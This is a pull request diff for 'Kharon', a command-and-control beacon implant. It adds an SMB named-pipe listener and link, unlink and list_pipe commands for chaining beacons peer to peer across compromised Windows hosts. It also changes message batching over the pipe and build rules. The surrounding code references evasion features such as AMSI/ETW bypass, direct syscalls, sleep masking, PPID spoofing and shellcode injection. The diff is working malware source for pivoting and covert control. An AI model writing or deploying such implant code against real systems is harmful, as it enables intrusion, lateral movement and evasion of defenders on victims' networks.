### PR TITLE
Add SMB Named-Pipe Listener with P2P Beacon Chaining

### DIFF
--- a/agent_kharon/dist/ax_config.axs
+++ b/agent_kharon/dist/ax_config.axs
@@ -175,7 +175,8 @@ function RegisterCommands(listenerType)
     let cmd_config_subcommands = [
         cmd_config_sleep, cmd_config_jitter, cmd_config_ppid, cmd_config_blockdll, cmd_config_spoofarg, cmd_config_wkrtime,
         cmd_config_killdate_date, cmd_config_killdate_exit, cmd_config_killdate_selfdel,
-        cmd_config_heap_obf, cmd_config_mask, cmd_config_amsietwbypass, cmd_config_spawnto, cmd_config_syscall, cmd_config_bofproxy, cmd_config_forkpipe
+        cmd_config_heap_obf, cmd_config_mask, cmd_config_amsietwbypass, cmd_config_spawnto, cmd_config_syscall, cmd_config_bofproxy,
+        cmd_config_forkpipe
     ];
 
     let cmd_config = ax.create_command("config", "Configuration management - adjust beacon behavior and settings", "config sleep 50s");
@@ -243,14 +244,39 @@ function RegisterCommands(listenerType)
     let cmd_execute = ax.create_command("execute", "Execute Beacon Object Files or post-exploitation shellcode modules");
     cmd_execute.addSubCommands([cmd_exec_bof, cmd_exec_postex]);
 
+    /// LINK
+
+    let cmd_link_smb = ax.create_command("smb", "Link to a child beacon over SMB named pipe", "link smb 10.10.10.5 kharon_c2", "Task: link SMB pivot");
+    cmd_link_smb.addArgString("target", true, "Target hostname or IP");
+    cmd_link_smb.addArgString("pipename", true, "Named pipe name");
+
+    let cmd_link = ax.create_command("link", "Link to a child beacon for pivoting");
+    cmd_link.addSubCommands([cmd_link_smb]);
+
+    /// UNLINK
+
+    let cmd_unlink = ax.create_command("unlink", "Unlink a child pivot beacon", "unlink <agent_id>", "Task: unlink pivot");
+    cmd_unlink.addArgString("agent_id", true, "Agent ID of child to disconnect");
+
     if(listenerType == "KharonHTTP") {
         let commands_external = ax.create_commands_group("kharon", [
-            cmd_info, cmd_config, cmd_exit, cmd_selfdel, cmd_execute, 
+            cmd_info, cmd_config, cmd_exit, cmd_selfdel, cmd_execute,
             cmd_fs, cmd_ps, cmd_token, cmd_scinject, cmd_upload,
-            cmd_download, cmd_socks, cmd_rportfwd
+            cmd_download, cmd_socks, cmd_rportfwd,
+            cmd_link, cmd_unlink
         ]);
-        
+
         return { commands_windows: commands_external }
+    }
+
+    if(listenerType == "KharonSMB") {
+        let commands_internal = ax.create_commands_group("kharon", [
+            cmd_info, cmd_config, cmd_exit, cmd_selfdel, cmd_execute,
+            cmd_fs, cmd_ps, cmd_token, cmd_scinject, cmd_upload,
+            cmd_download
+        ]);
+
+        return { commands_windows: commands_internal }
     }
 
     return ax.create_commands_group("none",[]);
@@ -419,21 +445,67 @@ function GenerateUI(listenerType)
     let layout = form.create_gridlayout();
     layout.addWidget(scroll, 0, 0, 1, 1);
 
+    // SMB beacons: no sleep/jitter (parent controls timing via pipe)
+    if(listenerType == "KharonSMB") {
+        let layout_scroll_smb = form.create_gridlayout();
+        layout_scroll_smb.addWidget(labelFormat,        0, 0, 1, 1);
+        layout_scroll_smb.addWidget(comboFormat,        0, 1, 1, 1);
+        layout_scroll_smb.addWidget(guardrails_group,   1, 0, 1, 3);
+        layout_scroll_smb.addWidget(killdate_group,     2, 0, 1, 3);
+        layout_scroll_smb.addWidget(postex_group,       3, 0, 1, 3);
+        layout_scroll_smb.addWidget(evasion_group,      4, 0, 1, 3);
+        layout_scroll_smb.addWidget(mask_group,         5, 0, 1, 3);
+
+        let panel_scroll_smb = form.create_panel();
+        panel_scroll_smb.setLayout(layout_scroll_smb);
+        const scroll_smb = form.create_scrollarea();
+        scroll_smb.setPanel(panel_scroll_smb);
+        let layout_smb = form.create_gridlayout();
+        layout_smb.addWidget(scroll_smb, 0, 0, 1, 1);
+
+        let container_smb = form.create_container();
+        container_smb.put("format", comboFormat);
+        container_smb.put("sleep", textSleep);
+        container_smb.put("jitter", spinJitter);
+        container_smb.put("guardrails_ip", textGuardrailsIP);
+        container_smb.put("guardrails_hostname", textGuardrailsHostname);
+        container_smb.put("guardrails_user", textGuardrailsUser);
+        container_smb.put("guardrails_domain", textGuardrailsDomain);
+        container_smb.put("killdate_check", killdate_group);
+        container_smb.put("killdate_date", dateKill);
+        container_smb.put("fork_pipename", textPipename);
+        container_smb.put("spawnto", textSpawnTo);
+        container_smb.put("bypass", bypass_combo);
+        container_smb.put("bof_api_proxy", bof_api_check);
+        container_smb.put("syscall", syscall_combo);
+        container_smb.put("mask_heap", heap_obf_check);
+        container_smb.put("mask_sleep", sleep_mask_combo);
+
+        let panel_smb = form.create_panel();
+        panel_smb.setLayout(layout_smb);
+        return {
+            ui_panel: panel_smb,
+            ui_container: container_smb,
+            ui_height: 800,
+            ui_width: 800
+        }
+    }
+
     let container = form.create_container()
     container.put("format", comboFormat)
     container.put("sleep", textSleep)
     container.put("jitter", spinJitter)
-    
+
     // Guardrails
     container.put("guardrails_ip", textGuardrailsIP)
     container.put("guardrails_hostname", textGuardrailsHostname)
     container.put("guardrails_user", textGuardrailsUser)
     container.put("guardrails_domain", textGuardrailsDomain)
-    
+
     // Killdate
     container.put("killdate_check", killdate_group)
     container.put("killdate_date", dateKill)
-    
+
     // Workingtime
     container.put("workingtime_check", workingtime_group)
     container.put("workingtime_start", timeStart)

--- a/agent_kharon/dist/ax_config.axs
+++ b/agent_kharon/dist/ax_config.axs
@@ -244,6 +244,11 @@ function RegisterCommands(listenerType)
     let cmd_execute = ax.create_command("execute", "Execute Beacon Object Files or post-exploitation shellcode modules");
     cmd_execute.addSubCommands([cmd_exec_bof, cmd_exec_postex]);
 
+    /// LIST PIPE
+
+    let cmd_list_pipe = ax.create_command("list_pipe", "List named pipes on target (wildcard filter)", "list_pipe kharon", "Task: enumerate named pipes");
+    cmd_list_pipe.addArgString("filter", false, "Pipe name filter (substring match)");
+
     /// LINK
 
     let cmd_link_smb = ax.create_command("smb", "Link to a child beacon over SMB named pipe", "link smb 10.10.10.5 kharon_c2", "Task: link SMB pivot");
@@ -263,7 +268,7 @@ function RegisterCommands(listenerType)
             cmd_info, cmd_config, cmd_exit, cmd_selfdel, cmd_execute,
             cmd_fs, cmd_ps, cmd_token, cmd_scinject, cmd_upload,
             cmd_download, cmd_socks, cmd_rportfwd,
-            cmd_link, cmd_unlink
+            cmd_link, cmd_unlink, cmd_list_pipe
         ]);
 
         return { commands_windows: commands_external }
@@ -273,7 +278,7 @@ function RegisterCommands(listenerType)
         let commands_internal = ax.create_commands_group("kharon", [
             cmd_info, cmd_config, cmd_exit, cmd_selfdel, cmd_execute,
             cmd_fs, cmd_ps, cmd_token, cmd_scinject, cmd_upload,
-            cmd_download, cmd_link, cmd_unlink
+            cmd_download, cmd_link, cmd_unlink, cmd_list_pipe
         ]);
 
         return { commands_windows: commands_internal }

--- a/agent_kharon/dist/ax_config.axs
+++ b/agent_kharon/dist/ax_config.axs
@@ -273,7 +273,7 @@ function RegisterCommands(listenerType)
         let commands_internal = ax.create_commands_group("kharon", [
             cmd_info, cmd_config, cmd_exit, cmd_selfdel, cmd_execute,
             cmd_fs, cmd_ps, cmd_token, cmd_scinject, cmd_upload,
-            cmd_download
+            cmd_download, cmd_link, cmd_unlink
         ]);
 
         return { commands_windows: commands_internal }

--- a/agent_kharon/dist/ax_config.axs
+++ b/agent_kharon/dist/ax_config.axs
@@ -251,9 +251,9 @@ function RegisterCommands(listenerType)
 
     /// LINK
 
-    let cmd_link_smb = ax.create_command("smb", "Link to a child beacon over SMB named pipe", "link smb 10.10.10.5 kharon_c2", "Task: link SMB pivot");
+    let cmd_link_smb = ax.create_command("smb", "Link to a child beacon over SMB named pipe", "link smb 10.10.10.5", "Task: link SMB pivot");
     cmd_link_smb.addArgString("target", true, "Target hostname or IP");
-    cmd_link_smb.addArgString("pipename", true, "Named pipe name");
+    cmd_link_smb.addArgString("pipename", false, "Named pipe name (uses listener default if omitted)");
 
     let cmd_link = ax.create_command("link", "Link to a child beacon for pivoting");
     cmd_link.addSubCommands([cmd_link_smb]);

--- a/agent_kharon/dist/config.yaml
+++ b/agent_kharon/dist/config.yaml
@@ -6,4 +6,5 @@ agent_name: "kharon"
 agent_watermark: "c17a905a"
 listeners:
   - "KharonHTTP"
+  - "KharonSMB"
 multi_listeners: false

--- a/agent_kharon/src_beacon/Include/Communication.h
+++ b/agent_kharon/src_beacon/Include/Communication.h
@@ -26,7 +26,8 @@ typedef struct {
 struct _SMB_PROFILE_DATA {
     CHAR* SmbUUID;
     CHAR* AgentUUID;
-    
+    CHAR* PipePath;
+
     HANDLE Handle;
 
     PACKAGE* Pkg;
@@ -199,7 +200,7 @@ struct HTTP_CONTEXT {
 /* ============ [ smb profile ] ============ */
 
 #ifndef SMB_PIPE_NAME
-#define SMB_PIPE_NAME L""
+#define SMB_PIPE_NAME { 0x00 }
 #endif // SMB_PIPE_NAME
 
 /* ============ [ http basic config ] ============ */

--- a/agent_kharon/src_beacon/Include/Kharon.h
+++ b/agent_kharon/src_beacon/Include/Kharon.h
@@ -1243,7 +1243,10 @@ public:
     ULONG Count = 0;
     JOBS* List  = nullptr;
 
-    CHAR TunnelUUID[37]   = "00000000-0000-0000-0000-000000000001"; 
+    ULONG QuickCount       = 0;  // QuickMsg entries appended to PostJobs during ExecuteAll (SMB)
+    ULONG PostJobsCountPos = 0;  // byte offset of taskCount field in PostJobs buffer
+
+    CHAR TunnelUUID[37]   = "00000000-0000-0000-0000-000000000001";
     CHAR DownloadUUID[37] = "00000000-0000-0000-0000-000000000002";
 
     CHAR* CurrentUUID  = nullptr;
@@ -1471,15 +1474,12 @@ public:
 
     struct {
         PVOID  Node;
-#if PROFILE_C2 == PROFILE_SMB
         PCHAR  Name;
         HANDLE Handle;
-#endif
     } Pipe = {
-        .Node = nullptr,
-#if PROFILE_C2 == PROFILE_SMB
-        .Name = SMB_PIPE_NAME
-#endif
+        .Node   = nullptr,
+        .Name   = nullptr,
+        .Handle = nullptr
     };
 
     auto Checkin( VOID ) -> BOOL;

--- a/agent_kharon/src_beacon/Include/Kharon.h
+++ b/agent_kharon/src_beacon/Include/Kharon.h
@@ -1476,10 +1476,12 @@ public:
         PVOID  Node;
         PCHAR  Name;
         HANDLE Handle;
+        BOOL   TasksRead;  // TRUE after Call 1 reads tasks, reset after Call 2 writes results
     } Pipe = {
-        .Node   = nullptr,
-        .Name   = nullptr,
-        .Handle = nullptr
+        .Node      = nullptr,
+        .Name      = nullptr,
+        .Handle    = nullptr,
+        .TasksRead = FALSE
     };
 
     auto Checkin( VOID ) -> BOOL;

--- a/agent_kharon/src_beacon/Include/Misc.h
+++ b/agent_kharon/src_beacon/Include/Misc.h
@@ -193,7 +193,8 @@ namespace Action {
     enum class Pivot {
         Link = 10,
         Unlink,
-        List
+        List,
+        Exchange = 20
     };
 
     enum class Up {

--- a/agent_kharon/src_beacon/Makefile
+++ b/agent_kharon/src_beacon/Makefile
@@ -24,30 +24,32 @@ INTN   := $(wildcard Source/Internals/*.cc)
 # Exclude Config.cc from prebuild
 SRC_NO_CONFIG    := $(filter-out Source/Config.cc, $(SRC))
 
-# Prebuild objects (all except Config.cc)
+# Prebuild objects (all except Config.cc and Communication/*.cc)
+# Communication files contain #if PROFILE_C2 conditionals and must be
+# force-recompiled when the profile changes (HTTP vs SMB)
 PREBUILD_OBJ64_PATHS := $(SRC_NO_CONFIG:%.cc=$(OBJ_PATH)/%.x64.obj) \
                         $(MISC:%.cc=$(OBJ_PATH)/%.x64.obj) \
-                        $(COMM:%.cc=$(OBJ_PATH)/%.x64.obj) \
                         $(EVS:%.cc=$(OBJ_PATH)/%.x64.obj) \
                         $(INTN:%.cc=$(OBJ_PATH)/%.x64.obj)
 
 PREBUILD_OBJ86_PATHS := $(SRC_NO_CONFIG:%.cc=$(OBJ_PATH)/%.x86.obj) \
                         $(MISC:%.cc=$(OBJ_PATH)/%.x86.obj) \
-                        $(COMM:%.cc=$(OBJ_PATH)/%.x86.obj) \
                         $(EVS:%.cc=$(OBJ_PATH)/%.x86.obj) \
                         $(INTN:%.cc=$(OBJ_PATH)/%.x86.obj)
 
-# Config objects (compiled ONLY in final build, not in prebuild)
+# Config + Communication objects (force-recompiled in final build, not in prebuild)
 CONFIG_OBJ64 := $(OBJ_PATH)/Config.x64.obj
 CONFIG_OBJ86 := $(OBJ_PATH)/Config.x86.obj
+COMM_OBJ64   := $(COMM:%.cc=$(OBJ_PATH)/%.x64.obj)
+COMM_OBJ86   := $(COMM:%.cc=$(OBJ_PATH)/%.x86.obj)
 
 # ASM objects
 ASM_OBJ64 := $(OBJ_PATH)/entry_asm.x64.obj $(OBJ_PATH)/spoof_asm.x64.obj
 ASM_OBJ86 := $(OBJ_PATH)/entry.x86.obj
 
 # All objects for final link
-OBJ64_FINAL  := $(PREBUILD_OBJ64_PATHS) $(ASM_OBJ64) $(CONFIG_OBJ64)
-OBJ86_FINAL  := $(PREBUILD_OBJ86_PATHS) $(ASM_OBJ86) $(CONFIG_OBJ86)
+OBJ64_FINAL  := $(PREBUILD_OBJ64_PATHS) $(COMM_OBJ64) $(ASM_OBJ64) $(CONFIG_OBJ64)
+OBJ86_FINAL  := $(PREBUILD_OBJ86_PATHS) $(COMM_OBJ86) $(ASM_OBJ86) $(CONFIG_OBJ86)
 
 DEFS := \
  	-D KH_AGENT_UUID='"$(KH_AGENT_UUID)"' \
@@ -85,6 +87,10 @@ DEFS := \
 	-D HTTP_PROXY_USERNAME='L"$(WEB_PROXY_USERNAME)"' \
 	-D SMB_PIPE_NAME=${SMB_PIPE_NAME} \
 
+ifdef PROFILE_C2
+DEFS += -D PROFILE_C2=$(PROFILE_C2)
+endif
+
 .PHONY: all release debug x64 x86 x64-debug x86-debug prebuild-x64 prebuild-x86 clean show-prebuild force_config
 
 all: release debug
@@ -113,14 +119,14 @@ prebuild-x86: nasm86 $(PREBUILD_OBJ86_PATHS)
 	@ echo "[✓] Prebuild x86 completed (Config.cc will be compiled in final build)"
 
 # ==================== FINAL BUILD TARGETS ====================
-x64: prebuild-x64 $(CONFIG_OBJ64)
+x64: prebuild-x64 $(CONFIG_OBJ64) $(COMM_OBJ64)
 	@ echo "[*] Linking x64..."
 	@ $(CCX64) $(OBJ64_FINAL) -o $(BUILD_PATH)/Bin/$(NAME).x64.exe $(CFLAGS)
 	@ objcopy --dump-section .text=$(BUILD_PATH)/Bin/$(NAME).x64.bin $(BUILD_PATH)/Bin/$(NAME).x64.exe
 	@ rm $(BUILD_PATH)/Bin/$(NAME).x64.exe
 	@ echo "[✓] Build x64 completed"
 
-x86: prebuild-x86 $(CONFIG_OBJ86)
+x86: prebuild-x86 $(CONFIG_OBJ86) $(COMM_OBJ86)
 	@ echo "[*] Linking x86..."
 	@ $(CCX86) $(OBJ86_FINAL) -o $(BUILD_PATH)/Bin/$(NAME).x86.exe $(CFLAGS)
 	@ objcopy --dump-section .text=$(BUILD_PATH)/Bin/$(NAME).x86.bin $(BUILD_PATH)/Bin/$(NAME).x86.exe
@@ -150,9 +156,20 @@ $(CONFIG_OBJ86): Source/Config.cc force_config
 	@ echo "[*] Compiling Config.cc x86..."
 	@ $(CCX86) -o $@ -c $< $(CFLAGS) $(DEFS)
 
-# Force Config.cc to always recompile
+# Communication/*.cc - force recompile (contain #if PROFILE_C2 conditionals)
+$(OBJ_PATH)/Source/Communication/%.x64.obj: Source/Communication/%.cc force_config
+	@ mkdir -p $(dir $@)
+	@ echo "[*] Compiling $< x64..."
+	@ $(CCX64) -o $@ -c $< $(CFLAGS) $(DEFS)
+
+$(OBJ_PATH)/Source/Communication/%.x86.obj: Source/Communication/%.cc force_config
+	@ mkdir -p $(dir $@)
+	@ echo "[*] Compiling $< x86..."
+	@ $(CCX86) -o $@ -c $< $(CFLAGS) $(DEFS)
+
+# Force Config.cc and Communication/*.cc to always recompile
 force_config:
-	@ # This forces Config.cc to always recompile when included as dependency
+	@ # This forces profile-dependent files to always recompile
 	@ true
 
 # ==================== ASM TARGETS ====================

--- a/agent_kharon/src_beacon/Source/Communication/Package.cc
+++ b/agent_kharon/src_beacon/Source/Communication/Package.cc
@@ -818,7 +818,7 @@ auto DECLFN Package::SendOut(
     _In_ INT32 Length
 ) -> BOOL {
     // SMB: append to PostJobs as MSG_OUT entry instead of calling Transmit
-    // (calling Transmit during ExecuteAll steals the SmbSend Call 2 pipe)
+    // (batching avoids interleaved writes on the persistent pipe)
     if ( Self->Tsp->Pipe.Name && Self->Jbs->PostJobs ) {
         this->Int32( Self->Jbs->PostJobs, (INT32)Action::Task::QuickOut );
         this->Pad( Self->Jbs->PostJobs, (UCHAR*)Self->Jbs->CurrentUUID, 36 );
@@ -905,7 +905,7 @@ auto DECLFN Package::FmtMsg(
     this->Str(Package, MsgBuff);
 
     // SMB: append to PostJobs as MSG_QUICK entry instead of calling Transmit
-    // (calling Transmit during ExecuteAll steals the SmbSend Call 2 pipe)
+    // (batching avoids interleaved writes on the persistent pipe)
     if ( Self->Tsp->Pipe.Name ) {
         if ( Self->Jbs->PostJobs ) {
             this->Int32( Self->Jbs->PostJobs, (INT32)Action::Task::QuickMsg );

--- a/agent_kharon/src_beacon/Source/Communication/Package.cc
+++ b/agent_kharon/src_beacon/Source/Communication/Package.cc
@@ -723,22 +723,27 @@ auto DECLFN Package::Transmit(
     Self->Mm->Free( EncBuffer, TotalPacketLen, MEM_RELEASE );
     
     if ( Success && RecvData.Ptr && RecvData.Size ) {
-        UCHAR* DecryptBuff   = RecvData.Ptr + EncryptOffset;
-        ULONG  DecryptLength = (ULONG)RecvData.Size - EncryptOffset;
 
-        if ( DecryptLength == 0 ) { 
-            KhDbg("Invalid decrypt length: %lu", DecryptLength);
-            if ( RecvData.Ptr ) KhFree( RecvData.Ptr );
-            return FALSE;
+        // HTTP: response is encrypted by the HTTP listener with LokyCrypt
+        // SMB: response is plaintext (server Encrypt/Decrypt are no-ops)
+        if ( ! Self->Tsp->Pipe.Name && RecvData.Size > EncryptOffset ) {
+            UCHAR* DecryptBuff   = RecvData.Ptr + EncryptOffset;
+            ULONG  DecryptLength = (ULONG)RecvData.Size - EncryptOffset;
+
+            if ( DecryptLength > 0 ) {
+                Self->Crp->Decrypt( DecryptBuff, DecryptLength );
+            }
         }
 
-        Self->Crp->Decrypt( DecryptBuff, DecryptLength );
-         
-        *Response = RecvData.Ptr;
-        *Size     = RecvData.Size;
-        
+        if ( Response && Size ) {
+            *Response = RecvData.Ptr;
+            *Size     = RecvData.Size;
+        } else {
+            KhFree( RecvData.Ptr );
+        }
+
         Success = TRUE;
-    } else if ( RecvData.Ptr ) {        
+    } else if ( RecvData.Ptr ) {
         KhFree( RecvData.Ptr );
         Success = FALSE;
     }
@@ -812,6 +817,18 @@ auto DECLFN Package::SendOut(
     _In_ BYTE* Buffer,
     _In_ INT32 Length
 ) -> BOOL {
+    // SMB: append to PostJobs as MSG_OUT entry instead of calling Transmit
+    // (calling Transmit during ExecuteAll steals the SmbSend Call 2 pipe)
+    if ( Self->Tsp->Pipe.Name && Self->Jbs->PostJobs ) {
+        this->Int32( Self->Jbs->PostJobs, (INT32)Action::Task::QuickOut );
+        this->Pad( Self->Jbs->PostJobs, (UCHAR*)Self->Jbs->CurrentUUID, 36 );
+        this->Int32( Self->Jbs->PostJobs, CmdID );
+        this->Int32( Self->Jbs->PostJobs, Type );
+        this->Bytes( Self->Jbs->PostJobs, Buffer, Length );
+        Self->Jbs->QuickCount++;
+        return TRUE;
+    }
+
     PACKAGE* Package = (PACKAGE*)KhAlloc( sizeof( PACKAGE ) );
 
     Package->Buffer = PTR( KhAlloc( sizeof( BYTE ) ) );
@@ -882,16 +899,25 @@ auto DECLFN Package::FmtMsg(
     this->Pad(Package, (PUCHAR)Self->Session.AgentID, 36);
     this->Byte(Package, (BYTE)Action::Task::QuickMsg);
 
-    if (PROFILE_C2 == PROFILE_SMB) {
-        // this->Pad(Package, (PUCHAR)SmbUUID, 36);
-    }
-
     this->Pad(Package, (PUCHAR)Self->Jbs->CurrentUUID, 36);
     this->Int32(Package, Type);
 
     this->Str(Package, MsgBuff);
 
-    result = this->Transmit(Package, nullptr, 0);
+    // SMB: append to PostJobs as MSG_QUICK entry instead of calling Transmit
+    // (calling Transmit during ExecuteAll steals the SmbSend Call 2 pipe)
+    if ( Self->Tsp->Pipe.Name ) {
+        if ( Self->Jbs->PostJobs ) {
+            this->Int32( Self->Jbs->PostJobs, (INT32)Action::Task::QuickMsg );
+            this->Pad( Self->Jbs->PostJobs, (UCHAR*)Self->Jbs->CurrentUUID, 36 );
+            this->Int32( Self->Jbs->PostJobs, Type );
+            this->Str( Self->Jbs->PostJobs, MsgBuff );
+            Self->Jbs->QuickCount++;
+        }
+        result = TRUE;
+    } else {
+        result = this->Transmit(Package, nullptr, 0);  // HTTP: send QuickMsg separately
+    }
 
 _KH_END:
 
@@ -908,6 +934,16 @@ auto DECLFN Package::SendMsgA(
     _In_ ULONG Type,
     _In_ CHAR* Message
 ) -> BOOL {
+    // SMB: append to PostJobs as MSG_QUICK entry instead of calling Transmit
+    if ( Self->Tsp->Pipe.Name && Self->Jbs->PostJobs ) {
+        this->Int32( Self->Jbs->PostJobs, (INT32)Action::Task::QuickMsg );
+        this->Pad( Self->Jbs->PostJobs, (UCHAR*)Self->Jbs->CurrentUUID, 36 );
+        this->Int32( Self->Jbs->PostJobs, Type );
+        this->Str( Self->Jbs->PostJobs, Message );
+        Self->Jbs->QuickCount++;
+        return TRUE;
+    }
+
     PACKAGE* Package = (PACKAGE*)KhAlloc( sizeof( PACKAGE ) );
 
     Package->Buffer = PTR( KhAlloc( sizeof( BYTE ) ) );
@@ -915,10 +951,6 @@ auto DECLFN Package::SendMsgA(
 
     this->Pad( Package, (PUCHAR)Self->Session.AgentID, 36 );
     this->Byte( Package, (BYTE)Action::Task::QuickMsg );
-
-    if ( PROFILE_C2 == PROFILE_SMB ) {
-        // this->Pad( Package, (PUCHAR)SmbUUID, 36 );
-    }
 
     this->Pad( Package, (UCHAR*)Self->Jbs->CurrentUUID, 36 );
     this->Int32( Package, Type );
@@ -935,6 +967,16 @@ auto DECLFN Package::SendMsgW(
     _In_ ULONG  Type,
     _In_ WCHAR* Message
 ) -> BOOL {
+    // SMB: append to PostJobs as MSG_QUICK entry instead of calling Transmit
+    if ( Self->Tsp->Pipe.Name && Self->Jbs->PostJobs ) {
+        this->Int32( Self->Jbs->PostJobs, (INT32)Action::Task::QuickMsg );
+        this->Pad( Self->Jbs->PostJobs, (UCHAR*)Self->Jbs->CurrentUUID, 36 );
+        this->Int32( Self->Jbs->PostJobs, Type );
+        this->Wstr( Self->Jbs->PostJobs, Message );
+        Self->Jbs->QuickCount++;
+        return TRUE;
+    }
+
     PACKAGE* Package = (PACKAGE*)KhAlloc( sizeof( PACKAGE ) );
 
     Package->Buffer = PTR( KhAlloc( sizeof( WCHAR ) ) );
@@ -942,10 +984,6 @@ auto DECLFN Package::SendMsgW(
 
     this->Pad( Package, (PUCHAR)Self->Session.AgentID, 36 );
     this->Byte( Package, (BYTE)Action::Task::QuickMsg );
-
-    if ( PROFILE_C2 == PROFILE_SMB ) {
-        // this->Pad( Package, (PUCHAR)SmbUUID, 36 );
-    }
 
     this->Pad( Package, (UCHAR*)Self->Jbs->CurrentUUID, 36 );
     this->Int32( Package, Type );
@@ -1043,10 +1081,16 @@ auto DECLFN Parser::Bytes(
     if ( this->Endian )
         Length = __builtin_bswap32( Length );
 
+    // Bounds check: Length must fit within remaining parser data
+    if ( Length > parser->Length - 4 ) {
+        if ( size != NULL ) *size = 0;
+        return NULL;
+    }
+
     outdata = B_PTR( parser->Buffer );
     if ( outdata == NULL )
         return NULL;
-        
+
     parser->Length -= 4;
     parser->Length -= Length;
     parser->Buffer += Length;

--- a/agent_kharon/src_beacon/Source/Communication/Smb.cc
+++ b/agent_kharon/src_beacon/Source/Communication/Smb.cc
@@ -171,7 +171,8 @@ auto Transport::SmbGet(
     SMB_PROFILE_DATA* Current = static_cast<SMB_PROFILE_DATA*>( this->Pipe.Node );
 
     while ( Current ) {
-        if ( Current->SmbUUID && Str::CompareA( Current->SmbUUID, SmbUUID ) == 0 ) {
+        ULONG matchLen = Str::LengthA( SmbUUID );
+        if ( Current->SmbUUID && Mem::Cmp( (PBYTE)Current->SmbUUID, (PBYTE)SmbUUID, matchLen ) ) {
             return Current;
         }
         Current = Current->Next;

--- a/agent_kharon/src_beacon/Source/Communication/Smb.cc
+++ b/agent_kharon/src_beacon/Source/Communication/Smb.cc
@@ -79,7 +79,7 @@ auto Transport::SmbAdd(
     SmbData->SmbUUID   = TmpUUID;
     SmbData->AgentUUID = TmpUUID;
 
-    // Store the pipe path for reconnection during task relay
+    // Store the pipe path for reference (handle is persistent, no reconnection needed)
     ULONG PathLen = Str::LengthA( NamedPipe ) + 1;
     SmbData->PipePath = (CHAR*)KhAlloc( PathLen );
     Mem::Copy( SmbData->PipePath, NamedPipe, PathLen );
@@ -186,15 +186,14 @@ auto Transport::SmbSend(
     _In_      MM_INFO* SendData,
     _Out_opt_ MM_INFO* RecvData
 ) -> BOOL {
-    BOOL Success = FALSE;
-    BOOL pipeJustCreated = FALSE;
 
-    Self->Ntdll.DbgPrint( "[SMB] SmbSend called, Pipe.Name=%s, Pipe.Handle=%p\n",
-        this->Pipe.Name ? this->Pipe.Name : "(null)", this->Pipe.Handle );
+    Self->Ntdll.DbgPrint( "[SMB] SmbSend called, Pipe.Name=%s, Pipe.Handle=%p, TasksRead=%d\n",
+        this->Pipe.Name ? this->Pipe.Name : "(null)", this->Pipe.Handle, this->Pipe.TasksRead );
 
-    // If the pipe handle doesn't exist yet, create it and wait for parent connection
+    // =====================================================================
+    // PHASE 1: Pipe creation + parent connection (only when no handle)
+    // =====================================================================
     if ( ! this->Pipe.Handle ) {
-        pipeJustCreated = TRUE;
         SECURITY_ATTRIBUTES* SecAttr = (SECURITY_ATTRIBUTES*)KhAlloc( sizeof( SECURITY_ATTRIBUTES ) );
         SECURITY_DESCRIPTOR* SecDesc = (SECURITY_DESCRIPTOR*)KhAlloc( SECURITY_DESCRIPTOR_MIN_LENGTH );
 
@@ -236,110 +235,104 @@ auto Transport::SmbSend(
         }
 
         Self->Ntdll.DbgPrint( "[SMB] Pipe created OK: %s, handle=%p\n", this->Pipe.Name, this->Pipe.Handle );
-    }
 
-    // Call 2: pipe is already connected from Call 1 — go directly to writing results
-    if ( ! pipeJustCreated && Self->Session.Connected ) {
-        Self->Ntdll.DbgPrint( "[SMB] Call 2: pipe still open, writing results directly\n" );
-        goto call2_write_results;
-    }
+        // Wait for parent beacon to connect (blocks until link command)
+        Self->Ntdll.DbgPrint( "[SMB] Waiting for parent to connect...\n" );
 
-    Self->Ntdll.DbgPrint( "[SMB] Waiting for parent to connect...\n" );
+        if ( ! Self->Krnl32.ConnectNamedPipe( this->Pipe.Handle, nullptr ) ) {
+            if ( KhGetError != ERROR_PIPE_CONNECTED ) {
+                Self->Ntdll.DbgPrint( "[SMB] ConnectNamedPipe failed: %d\n", KhGetError );
+                goto pipe_error;
+            }
+        }
 
-    // Wait for parent beacon to connect
-    if ( ! Self->Krnl32.ConnectNamedPipe( this->Pipe.Handle, nullptr ) ) {
-        if ( KhGetError != ERROR_PIPE_CONNECTED ) {
-            Self->Ntdll.DbgPrint( "[SMB] ConnectNamedPipe failed: %d\n", KhGetError );
-            return FALSE;
+        Self->Ntdll.DbgPrint( "[SMB] Parent connected!\n" );
+
+        // FIRST CHECKIN: write checkin data, keep pipe open
+        if ( ! Self->Session.Connected ) {
+            if ( SendData && SendData->Ptr && SendData->Size > 0 ) {
+                ULONG WriteLen = 0;
+                ULONG DataLen  = (ULONG)SendData->Size;
+
+                ULONG TotalLen = sizeof(ULONG) + DataLen;
+                PBYTE CombinedBuf = (PBYTE)KhAlloc( TotalLen );
+                Mem::Copy( CombinedBuf, &DataLen, sizeof(ULONG) );
+                Mem::Copy( CombinedBuf + sizeof(ULONG), SendData->Ptr, DataLen );
+
+                if ( ! Self->Krnl32.WriteFile( this->Pipe.Handle, CombinedBuf, TotalLen, &WriteLen, nullptr ) ) {
+                    Self->Ntdll.DbgPrint( "[SMB] Checkin WriteFile failed: %d\n", KhGetError );
+                    KhFree( CombinedBuf );
+                    goto pipe_error;
+                }
+                KhFree( CombinedBuf );
+
+                Self->Ntdll.DbgPrint( "[SMB] Wrote %d bytes checkin — pipe stays open\n", DataLen );
+            }
+
+            // Pipe stays open — next Dispatcher cycle will read first tasks
+            this->Pipe.TasksRead = FALSE;
+            return TRUE;
         }
     }
 
-    Self->Ntdll.DbgPrint( "[SMB] Parent connected!\n" );
+    // =====================================================================
+    // PHASE 2: Persistent handle — alternating read/write via TasksRead flag
+    //   Call 1 (TasksRead=FALSE): READ tasks from parent
+    //   Call 2 (TasksRead=TRUE):  WRITE results to parent
+    // =====================================================================
 
-    // FIRST CHECKIN: write checkin data, close pipe
-    if ( ! Self->Session.Connected ) {
-        if ( SendData && SendData->Ptr && SendData->Size > 0 ) {
-            ULONG WriteLen = 0;
-            ULONG DataLen  = (ULONG)SendData->Size;
-
-            // Single message write for PIPE_TYPE_MESSAGE
-            ULONG TotalLen = sizeof(ULONG) + DataLen;
-            PBYTE CombinedBuf = (PBYTE)KhAlloc( TotalLen );
-            Mem::Copy( CombinedBuf, &DataLen, sizeof(ULONG) );
-            Mem::Copy( CombinedBuf + sizeof(ULONG), SendData->Ptr, DataLen );
-            Self->Krnl32.WriteFile( this->Pipe.Handle, CombinedBuf, TotalLen, &WriteLen, nullptr );
-            KhFree( CombinedBuf );
-
-            Self->Ntdll.DbgPrint( "[SMB] Wrote %d bytes checkin to pipe\n", DataLen );
-        }
-
-        Self->Ntdll.DbgPrint( "[SMB] First checkin — not waiting for response\n" );
-        Self->Ntdll.NtClose( this->Pipe.Handle );
